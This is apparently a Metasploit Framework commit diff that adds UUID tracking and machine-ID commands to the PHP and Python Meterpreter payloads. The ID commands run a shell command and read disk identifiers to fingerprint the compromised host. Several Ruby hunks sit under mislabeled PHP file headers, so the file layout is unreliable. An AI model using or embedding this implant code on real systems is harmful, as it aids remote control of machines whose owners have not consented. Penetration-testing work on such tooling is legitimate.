Land rapid7#5367, add UUID stagers

Author: Brent Cook

Gemfile.lock

@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 0.0.7)
+      metasploit-payloads (= 1.0.1)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (0.0.7)
+    metasploit-payloads (1.0.1)
     metasploit_data_models (1.1.0)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)

data/meterpreter/meterpreter.php

@@ -1,4 +1,4 @@
-#<?php
+//<?php
 
 # Everything that needs to be global has to be made so explicitly so we can run
 # inside a call to create_user_func($user_input);
@@ -32,7 +32,7 @@
 
 # global list of extension commands
 if (!isset($GLOBALS['commands'])) {
-    $GLOBALS['commands'] = array("core_loadlib");
+    $GLOBALS['commands'] = array("core_loadlib", "core_machine_id", "core_uuid");
 }
 
 function register_command($c) {
@@ -99,18 +99,21 @@ function socket_set_option($sock, $type, $opt, $value) {
 }
 }
 
+#
+# Payload definitions
+#
+define("PAYLOAD_UUID", "");
 
 #
 # Constants
 #
-define("PACKET_TYPE_REQUEST",0);
-define("PACKET_TYPE_RESPONSE",1);
-define("PACKET_TYPE_PLAIN_REQUEST", 10);
+define("PACKET_TYPE_REQUEST",         0);
+define("PACKET_TYPE_RESPONSE",        1);
+define("PACKET_TYPE_PLAIN_REQUEST",  10);
 define("PACKET_TYPE_PLAIN_RESPONSE", 11);
 
-define("ERROR_SUCCESS",0);
-# not defined in original C implementation
-define("ERROR_FAILURE",1);
+define("ERROR_SUCCESS", 0);
+define("ERROR_FAILURE", 1);
 
 define("CHANNEL_CLASS_BUFFERED", 0);
 define("CHANNEL_CLASS_STREAM",   1);
@@ -175,6 +178,9 @@ function socket_set_option($sock, $type, $opt, $value) {
 define("TLV_TYPE_MIGRATE_PID",         TLV_META_TYPE_UINT   | 402);
 define("TLV_TYPE_MIGRATE_LEN",         TLV_META_TYPE_UINT   | 403);
 
+define("TLV_TYPE_MACHINE_ID",          TLV_META_TYPE_STRING | 460);
+define("TLV_TYPE_UUID",                TLV_META_TYPE_RAW    | 461);
+
 define("TLV_TYPE_CIPHER_NAME",         TLV_META_TYPE_STRING | 500);
 define("TLV_TYPE_CIPHER_PARAMETERS",   TLV_META_TYPE_GROUP  | 501);
 
@@ -419,8 +425,41 @@ function core_loadlib($req, &$pkt) {
 }
 
 
+function core_uuid($req, &$pkt) {
+    my_print("doing core_uuid");
+    packet_add_tlv($pkt, create_tlv(TLV_TYPE_UUID, PAYLOAD_UUID));
+    return ERROR_SUCCESS;
+}
 
 
+function get_hdd_label() {
+  foreach (scandir('/dev/disk/by-id/') as $file) {
+    foreach (array("ata-", "mb-") as $prefix) {
+      if (strpos($file, $prefix) === 0) {
+        return substr($file, strlen($prefix));
+      }
+    }
+  }
+  return "";
+}
+
+function core_machine_id($req, &$pkt) {
+  my_print("doing core_machine_id");
+  $machine_id = gethostname();
+  $serial = "";
+
+  if (is_windows()) {
+    # It's dirty, but there's not really a nicer way of doing this on windows. Make sure
+    # it's lowercase as this is what the other meterpreters use.
+    $output = strtolower(shell_exec("vol %SYSTEMDRIVE%"));
+    $serial = preg_replace('/.*serial number is ([a-z0-9]{4}-[a-z0-9]{4}).*/s', '$1', $output);
+  } else {
+    $serial = get_hdd_label();
+  }
+
+  packet_add_tlv($pkt, create_tlv(TLV_TYPE_MACHINE_ID, $serial.":".$machine_id));
+  return ERROR_SUCCESS;
+}
 
 
 ##

data/meterpreter/meterpreter.py

@@ -67,6 +67,7 @@
 HTTP_EXPIRATION_TIMEOUT = 604800
 HTTP_PROXY = None
 HTTP_USER_AGENT = None
+PAYLOAD_UUID = ""
 
 PACKET_TYPE_REQUEST        = 0
 PACKET_TYPE_RESPONSE       = 1
@@ -144,6 +145,7 @@
 TLV_TYPE_MIGRATE_LEN           = TLV_META_TYPE_UINT    | 403
 
 TLV_TYPE_MACHINE_ID            = TLV_META_TYPE_STRING  | 460
+TLV_TYPE_UUID                  = TLV_META_TYPE_RAW     | 461
 
 TLV_TYPE_CIPHER_NAME           = TLV_META_TYPE_STRING  | 500
 TLV_TYPE_CIPHER_PARAMETERS     = TLV_META_TYPE_GROUP   | 501
@@ -570,7 +572,19 @@ def handle_dead_resource_channel(self, channel_id):
 		pkt  = struct.pack('>I', len(pkt) + 4) + pkt
 		self.send_packet(pkt)
 
+	def _core_uuid(self, request, response):
+		response += tlv_pack(TLV_TYPE_UUID, PAYLOAD_UUID)
+		return ERROR_SUCCESS, response
+
 	def _core_machine_id(self, request, response):
+		def get_hdd_label():
+			for _, _, files in os.walk('/dev/disk/by-id/'):
+				for f in files:
+					for p in ['ata-', 'mb-']:
+						if f[:len(p)] == p:
+							return f[len(p):]
+			return ""
+
 		serial = ''
 		machine_name = platform.uname()[1]
 		if has_windll:
@@ -592,11 +606,8 @@ def _core_machine_id(self, request, response):
 			serial_num = serial_num.value
 			serial = "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
 		else:
-			for _, _, files in os.walk('/dev/disk/by-id/'):
-				for f in files:
-					if f[:4] == 'ata-':
-						serial = f[4:]
-						break
+			serial = get_hdd_label()
+
 		response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
 		return ERROR_SUCCESS, response
 

data/php/bind_tcp.php

@@ -254,7 +254,10 @@ def on_request(cli, req, obj)
         url = payload_uri(req) + conn_id + '/'
 
         blob = ""
-        blob << obj.generate_stage
+        blob << obj.generate_stage(
+          uuid: uuid,
+          uri:  conn_id
+        )
 
         var_escape = lambda { |txt|
           txt.gsub('\\', '\\'*8).gsub('\'', %q(\\\\\\\'))
@@ -291,7 +294,10 @@ def on_request(cli, req, obj)
         url = payload_uri(req) + conn_id + "/\x00"
 
         blob = ""
-        blob << obj.generate_stage
+        blob << obj.generate_stage(
+          uuid: uuid,
+          uri:  conn_id
+        )
 
         # This is a TLV packet - I guess somewhere there should be an API for building them
         # in Metasploit :-)

data/php/bind_tcp_ipv6.php

@@ -318,6 +318,16 @@ def generate_complete
     apply_prepends(generate)
   end
 
+  #
+  # Convert raw bytes to metasm-ready 'db' encoding format
+  # eg. "\x90\xCC" => "db 0x90,0xCC"
+  #
+  # @param raw [Array] Byte array to encode.
+  #
+  def raw_to_db(raw)
+    raw.unpack("C*").map {|c| "0x%.2x" % c}.join(",")
+  end
+
   #
   # Substitutes variables with values from the module's datastore in the
   # supplied raw buffer for a given set of named offsets.  For instance,

data/php/reverse_tcp.php

@@ -17,7 +17,7 @@ def fix_dex_header(dexfile)
   #
   # We could compile the .class files with dx here
   #
-  def generate_stage
+  def generate_stage(opts={})
   end
 
   #

lib/msf/core/handler/reverse_http.rb

@@ -123,8 +123,8 @@ def stage_over_connection?
     redirect_to_actual(:stage_over_connection?)
   end
 
-  def generate_stage
-    redirect_to_actual(:generate_stage)
+  def generate_stage(opts={})
+    redirect_to_actual(:generate_stage, opts)
   end
 
   def handle_connection_stage(*args)